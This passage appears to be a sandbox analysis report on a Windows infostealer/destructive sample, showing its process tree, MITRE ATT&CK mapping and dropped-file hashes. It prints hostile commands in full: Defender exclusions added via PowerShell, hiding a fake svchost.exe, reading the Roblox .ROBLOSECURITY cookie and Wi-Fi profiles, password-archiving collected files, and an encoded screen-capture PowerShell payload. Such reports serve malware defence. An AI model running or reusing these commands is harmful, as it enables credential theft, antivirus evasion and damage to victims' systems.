- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SecurityHealthSystray'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:400
-
-
C:\Windows\SYSTEM32\CMD.EXE"CMD.EXE"5⤵PID:736
-
-
C:\Users\Admin\AppData\Local\Temp\ybbhjh.exe"C:\Users\Admin\AppData\Local\Temp\ybbhjh.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4360 -
C:\Users\Admin\AppData\Local\Temp\ybbhjh.exe"C:\Users\Admin\AppData\Local\Temp\ybbhjh.exe" /watchdog6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1080
-
-
C:\Users\Admin\AppData\Local\Temp\ybbhjh.exe"C:\Users\Admin\AppData\Local\Temp\ybbhjh.exe" /watchdog6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4584
-
-
C:\Users\Admin\AppData\Local\Temp\ybbhjh.exe"C:\Users\Admin\AppData\Local\Temp\ybbhjh.exe" /watchdog6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:400
-
-
C:\Users\Admin\AppData\Local\Temp\ybbhjh.exe"C:\Users\Admin\AppData\Local\Temp\ybbhjh.exe" /watchdog6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3132
-
-
C:\Users\Admin\AppData\Local\Temp\ybbhjh.exe"C:\Users\Admin\AppData\Local\Temp\ybbhjh.exe" /watchdog6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2888
-
-
C:\Users\Admin\AppData\Local\Temp\ybbhjh.exe"C:\Users\Admin\AppData\Local\Temp\ybbhjh.exe" /main6⤵
- Checks computer location settings
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4660 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" \note.txt7⤵
- System Location Discovery: System Language Discovery
PID:4200
-
-
C:\Windows\SysWOW64\calc.exe"C:\Windows\System32\calc.exe"7⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4288
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\svchost.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\svchost.exe"4⤵
- Views/modifies file attributes
PID:3784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:3224 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4332
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3760 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:3776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:3944 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4772
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2896 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0ouwmo1q\0ouwmo1q.cmdline"5⤵PID:552
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9683.tmp" "c:\Users\Admin\AppData\Local\Temp\0ouwmo1q\CSC837DCC3FD25C4295B39BDDAE1A7B1B.TMP"6⤵PID:2760
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1092
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1640
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3624
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1760
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3612
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:3096
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4332
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:4076
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:4116
-
C:\Windows\system32\getmac.exegetmac4⤵PID:2456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI20082\rar.exe a -r -hp"b123" "C:\Users\Admin\AppData\Local\Temp\BbTlW.zip" *"3⤵PID:3960
-
C:\Users\Admin\AppData\Local\Temp\_MEI20082\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI20082\rar.exe a -r -hp"b123" "C:\Users\Admin\AppData\Local\Temp\BbTlW.zip" *4⤵
- Executes dropped EXE
PID:864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:1160
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4508
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:3264
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:736
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:4820
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:2992
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:2944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:1512
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\svchost.exe""3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3660 -
C:\Windows\system32\PING.EXEping localhost -n 34⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1160
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1932
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2036
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:4324
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Pre-OS Boot
1Bootkit
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Modify Registry
1Obfuscated Files or Information
1Command Obfuscation
1Pre-OS Boot
1Bootkit
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Discovery
Browser Information Discovery
1Peripheral Device Discovery
1Process Discovery
1Query Registry
3Remote System Discovery
1System Information Discovery
5System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
2Internet Connection Discovery
1Wi-Fi Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD58740e7db6a0d290c198447b1f16d5281
SHA1ab54460bb918f4af8a651317c8b53a8f6bfb70cd
SHA256f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5
SHA512d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b
-
Filesize
944B
MD562623d22bd9e037191765d5083ce16a3
SHA14a07da6872672f715a4780513d95ed8ddeefd259
SHA25695d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010
SHA5129a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992
-
Filesize
1KB
MD5e67b7a4d382c8b1625787f0bcae42150
SHA1cc929958276bc5efa47535055329972f119327c6
SHA256053d0b08f22ff5121cb832d514195145a55b9a4ca26d1decd446e11b64bef89c
SHA5123bf0311fe0c57fb9a1976fbeae6d37015736c32c59832252f3bc4c055b2a14c6bcc975dcd63b480d4f520672687a62d5ccd709a6ebdb4566bb83fb081b3f4452
-
Filesize
1KB
MD59827c26c051314aabbd73a4aa1b975b4
SHA10b91210c55334691bf2baf20d74d3d605fab48e0
SHA256cd374e05b2880f967174a42091a39a0e1fffa3899aca3749c61ec2628735cddf
SHA5127f08dfaf29d7e975fdb7b64b4e102cffa435655daf656d7b08f2da045718cf4d62c9f929b5eef350f50352e45c70a10ccded047d43088d280dbe47773b3267f0
-
Filesize
1KB
MD57511c81925750deb7ad1b9b80eea8a8d
SHA16ea759b3cbd243ae11435c6d6c5ced185eb01f49
SHA2565b49723a7773f2fe1f6093236e7b9b2c546f0873635d02346cb39535811234fa
SHA5125f7e69316d39525d137a7a833f8c746ceef8f1b2295348393fb3244cca8b962fbaad0f7da49da453fe97e2c49b1f41f06138111ac5ff97fdc33c300350ec3a1b
-
Filesize
944B
MD5c063ed22c2d1417c3c67e96c8d8ff0f3
SHA109e6afb1fbfa264803837eefa9c21f628278410b
SHA256ef894b5d435da70de0b29cf9852447b54dbd00f38883d64f1d6c8e2260381958
SHA5120cc8104dd0c2d0b4f95224ec586c082b062d2c055b5b000bebef4d68134701144558d01cfd22973397a1e50304cb841c97065be1d67644b97bf2c4ab1f77e449
-
Filesize
4KB
MD565c62836121a7d0c5745f9c95ebecfce
SHA1089f313fbd73083df9c8b718339296936601a85d
SHA25684a6ce4e0b847aea3d120be64fb7b7cf46744392d265572bdc421e48852a9893
SHA51292feb8bf25b7b04e283476666c59a67754c3330edc95c1bc244307af406d7cd0a3f35de95c0efb0c3b351c611c2a0e7a857ef8661f9740589c4a52759ebe1557
-
Filesize
1KB
MD5e417a9fdc372d771016145b22f88c693
